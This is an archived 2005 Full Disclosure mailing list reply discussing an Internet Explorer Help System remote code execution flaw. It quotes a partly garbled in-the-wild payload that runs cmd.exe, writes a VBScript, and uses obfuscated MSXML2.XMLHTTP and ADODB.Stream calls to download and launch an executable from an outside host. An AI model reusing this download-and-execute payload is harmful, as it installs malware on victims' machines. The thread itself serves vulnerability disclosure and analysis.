Full Disclosure mailing list archives

Re: Internet Explorer Help System RCE
From: Duncan Hill <dhill+fulldisc () cricalix net>
Date: Fri, 13 May 2005 06:25:54 +0100

On Friday 13 May 2005 06:15, Mike Allen wrote:

Modded it slightly to do alert instead of document.write and executed on my 
Linux box.

u Q<    WVruCP      A<object id=a 
<param name=command ______alue=shortcut> 
<param name=item1 __alue=',cmd.exe,/c start /min cmd.exe /c "echo on error 
resume next : set o = CreateObject("msxm"+"l2.X"+"MLH"+"TTP") : o.open 
"G"+"ET","http://iframedollars.biz/dl/loadad____622.exe",False : o.send : set 
s = createobject("adod"+"b.str"+"eam") : s.type=1 : s.open : s.write 
o.responseBody : s.sa____etofile "C:"+"\"+"w.e"+"xe",2 > c:\c.___bs&&wscript 
c:\c.______bs&&del c:\c.___bs&&if exist c:\w.exe start c:\w.exe"'> 

Not sure if the corruption is from editing the script.

Oh, that script at the end is JavaScript btw, not PHP.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
